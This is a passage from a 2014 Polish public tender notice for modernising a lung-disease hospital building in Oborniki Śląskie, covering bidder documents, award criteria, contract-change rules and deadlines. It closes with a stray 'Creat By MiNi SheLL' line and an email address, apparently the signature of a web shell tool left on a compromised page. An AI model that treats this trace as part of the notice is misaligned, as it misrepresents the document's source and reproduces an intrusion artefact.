3.	Oświadczenie o grupach kapitałowych (treść oświadczenia zawiera wzór oferty -  stanowiący załącznik nr 1 do SIWZ)
4.	wypełniony formularz oferty  wraz z kosztorysem ofertowym  i składnikami cenotwórczymi ( zał. nr 1 do SIWZ); Uwaga - kosztorys ofertowy załączony do oferty służyć ma sprawdzaniu wykonanych robót, nie decyduje o charakterze rozliczeń. Umowa pozostaje w charakterze ryczałtowym.
5.	Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 u Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
6.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
7.	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
8.	aktualna informacja  z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy, wystawionej  nie wcześniej niż 6 miesięcy przed terminem składania ofert.
9.	aktualna informacja z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust. 1    pkt. 9 ustawy, wystawionej  nie wcześniej niż 6 miesięcy przed  terminem składania ofert.
10.	aktualna informacja z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust. 1    pkt. 10-11 ustawy, wystawionej  nie wcześniej niż 6 miesięcy przed  terminem składania ofert.
pozostałe dokumenty
1.	Wypełniony wykaz wykonanych robót budowlanych  wraz z załączeniem dokumentów  potwierdzających ich należyte wykonanie  zgodnie z (zał . nr 3 do siwz).
2.	Wypełniony wykaz osób i podmiotów  zgodnie z (zał. nr 4 do siwz).
3.	Oświadczenie, że osoby, która będzie uczestniczyć w wykonywaniu zamówienia  posiadają wymagane uprawnienia jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień; min. Kierownik budowy-  posiada  uprawnienia do kierowania robotami budowlanymi w specjalności budowlanej, opisanej w SIWZ. (w zał. Nr 1 do SIWZ)
4.	Informację banku lub spółdzielczej kasy oszczędnościowo kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę  na kwotę  nie mniejszą niż  500 000 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
5.	Opłaconą   polisę, a w przypadku jej braku - innego dokument potwierdzający, że wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia,  na kwotę  nie mniejszą niż 500 000 zł
6.	Dowód wniesienia  wadium. Prosimy o dołączenie do oferty kserokopii potwierdzonej za zgodność 
z oryginałem dokumentu stanowiącego wadium przetargowe. 
7.	Oryginał pełnomocnictwa (jeśli jest wymagane). Uwaga! Wymagana jest forma pisemna i rodzaj pełnomocnictwa właściwy do poszczególnych czynności, a przede wszystkim do  reprezentowania 
w przedmiotowym postępowaniu (w tym do podpisania oferty) albo do reprezentowania 
w przedmiotowym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego

VIII. 2. Wykonawcy zagraniczni;  Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8 ustawy mają miejsce zamieszkania poza terytorium Rzeczypospolitej  Polskiej,  wykonawca  składa  w  odniesieniu  do  nich  zaświadczenie  właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust.1 pkt 5-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem  terminu  składania  wniosków  o  dopuszczenie  do  udziału  w postępowaniu  o  udzielenie zamówienia albo składania ofert, z tym że w przypadku, gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób.
2.1 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
Polskiej: - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
2.1a)   nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument powinien  być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2.1b)   nie  zalega  z  uiszczaniem  podatków,  opłat,  składek  na  ubezpieczenie  społeczne  
i zdrowotne albo Że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty  zaległych płatności  lub wstrzymanie w całości  wykonania decyzji  właściwego organu. Dokument powinien  być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
2.1c)   nie orzeczono wobec niego zakazu ubiegania się o zamówienie. Dokument lub dokumenty  powinny  być wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2.2) składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy PZP. Dokument powinien  być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2.3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem,  właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
2.4. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem  o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - okres gwarancji jakości - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>XVIII. Przewidywane możliwości zmiany postanowień umowy 
1.Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem ust. 2
2.Dopuszcza się zmiany niniejszej umowy w zakresie:

1/wykonania robót zamiennych (przez co rozumie się roboty, elementy robót konieczne z punktu widzenia zmian projektowych w stosunku do przewidzianych dokumentacją projektową w sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy.
2. rezygnacji z wykonywania części (elementów) przedmiotu umowy przewidzianych w dokumentacji projektowej w sytuacji, gdy ich wykonanie będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy. Roboty takie w dalszej części umowy nazywane są robotami zaniechanymi. Sposób wyliczenia wartości tych robót określa § 13 ust. 8 niniejszej umowy.
3. zmiany stawki podatku VAT w przypadku urzędowej zmiany stawki podatku VAT, 
            4. zmiany formy prawnej Zamawiającego.
            5. terminu wykonania, o ile będzie to konieczne z uwagi na nieprzewidziane okoliczności na które wykonawca nie miał wpływu np. ujawnienie błędów w dokumentacji, działanie siły wyższej oraz przedmiotu zamówienia w niezbędnym zakresie, nie prowadzącym jednak do zwiększenia jego wielkości lub zakresu i pod warunkiem, że będą one korzystne dla Zmawiającego, lub zakresu, o ile będzie to konieczne z uwagi na nieprzewidziane okoliczności na które wykonawca nie miał wpływu.
6. zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że zmiany te będą korzystne dla Zamawiającego i przez niego zaakceptowane. Będą to przykładowo, okoliczności:
a) powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy;
b) powodujące poprawienie parametrów technicznych;
c) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany potrzeb Zamawiającego lub zmiany obowiązujących przepisów.
Dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń
7)wszelkich zmian umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian 
w obowiązujących przepisach prawa.
8)aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów,
9)Terminu wykonania w przypadku:
a)przestojów i opóźnień zawinionych przez Zamawiającego, lub innego Wykonawcy zatrudnionego przez Zamawiającego na terenie budowy, albo z powodu innych przyczyn o obiektywnym charakterze, których nie dało się wcześniej przewidzieć.
b) działania siły wyższej (na przykład klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonywania robót;
 c) wystąpienia warunków pogodowych, przy których wykonanie przedmiotu umowy ze względów technologicznych jest niemożliwe, o czas trwania warunków pogodowych powodujących niemożliwość wykonania przedmiotu umowy, pod warunkiem potwierdzenia zaistnienia złych warunków pogodowych przez odpowiedni wpis w dzienniku budowy przez właściwego inspektora nadzoru.
d)wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;
e)wykopalisk/znalezisk uniemożliwiających wykonywanie robót;
f)podpisania umowy na zamówienia wykraczające poza przedmiot zamówienia podstawowego, o ile wykonywanie tych zamówień wpływa na termin wykonania niniejszej umowy.
10)podwykonawców,
11)zmiany osób reprezentujących lub wykonujących funkcje kierownicze, pod warunkiem wcześniejszego powiadomienia drugiej strony, w następujących przypadkach:
a)	śmierci, choroby lub innych zdarzeń losowych
b)	niewywiązywania się z obowiązków wynikających z umowy
c)	jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji)
d)	wykonawca może dokonywać zmiany Kluczowych Specjalistów, przedstawionych 
w ofercie, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nowego Kluczowego Specjalistę
e)	wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących przypadkach:
- śmierci, choroby lub innych zdarzeń losowych Kluczowego Specjalisty
- nie wywiązywania się Kluczowego Specjalisty z obowiązków wynikających z umowy
- jeżeli zmiana Kluczowego Specjalisty stanie się konieczna z innych przyczyn niezależnych od Wykonawcy (np. rezygnacji)
              f) Zamawiający może żądać od Wykonawcy zmiany Kluczowego Specjalisty, jeżeli uzna, że      Kluczowy Specjalista nie wykonuje swoich obowiązków wynikających z umowy,
             g) w przypadku zmiany kluczowego specjalisty, nowy Kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
12)W przypadku, gdy Zamawiający pozostaje w zwłoce w udostępnieniu placu budowy, wymaganej dokumentacji, termin realizacji zamówienia ulega automatycznie przedłużeniu o ilość dni zwłoki, w jakiej pozostaje Zamawiający (od dnia powstania zwłoki do dnia protokolarnego przekazania placu budowy lub określonej dokumentacji). Wystąpienie takiej sytuacji wymaga stosownej notatki służbowej zaakceptowanej przez inspektora nadzoru oraz Zamawiającego, a także sporządzenia aneksu do umowy w formie pisemnej pod rygorem nieważności.

13)Zamawiający dopuszcza ewentualne zmiany w zakresie harmonogramu, jeżeli  będą one uzasadnione organizacyjnie i  technicznie i  będą korzystne dla  Zamawiającego pod względem zapewnienia możliwości  realizowania  świadczeń  medycznych
14)Dopuszcza się zmiany w zakresie rozliczeń z głównym wykonawcą na rzecz podwykonawców, przy założeniu, że o taką formę wystąpi Wykonawca wraz z podwykonawcą, a każda prośba o uregulowanie płatności bezpośrednio na rzecz podwykonawcy będzie miała formę pisemną i będzie zawierała wskazanie zakresu wszystkich wykonanych prac przez podwykonawcę w danym miesiącu, potwierdzoną protokołem odbioru oraz fakturą
4.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej, pod rygorem nieważności. 
5.	Zmiany umowy muszą być każdorazowo zatwierdzane przez Zamawiającego w porozumieniu z projektantem i nie mogą powodować podwyższenia ceny.
6.	Zmiana umowy dokonana z naruszeniem ust 1-3 jest nieważna.
 7.Zmiana formy zabezpieczenia umowy: zmiana przewidziana w art. 149 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907, 984, 1047 i 1473 oraz z 2014 r. poz. 423).
8.Zmiana podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie.
9.Zgodne z regulacją art. 144 u Pzp:
a)	zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba, że zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
b)	dopuszczalne będą zmiany nieistotne, uznane za tożsame , tzn. takie, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynie na krąg podmiotów ubiegających się o to zamówienie lub wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dcchp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 53-439 Wrocław ul. Grabiszyńska 105 w siedzibie Zamawiającego - koszt wydruku 20 zł brutto plus koszt przesyłki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2014 godzina 11:30, miejsce: Ofertę  należy złożyć w Kancelarii  siedziby Zamawiającego pokój nr 4 (wysoki pater)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie realizowane w ramach Projektu pn. Modernizacja i rozbudowa wraz z doposażeniem obiektu Leśne na potrzeby ośrodka ftyzjatrycznego Dolnośląskiego Centrum Chorób Płuc we Wrocławiu   w Placówce Zamiejscowej  w Obornikach Śląskich.
Zamówienie dofinansowane w ramach naboru numer 15-S-8.1-2010 prowadzonego w trybie systemowym dla Priorytetu VIII Modernizacja infrastruktury ochrony zdrowia na Dolnym Śląsku (Zdrowie), Działanie 8.1 Poprawa jakości opieki zdrowotnej Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013

Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli zamawiający przewidział taką możliwość wykluczenia wykonawcy w ogłoszeniu o zamówieniu, w specyfikacji istotnych warunków zamówienia lub w zaproszeniu do negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com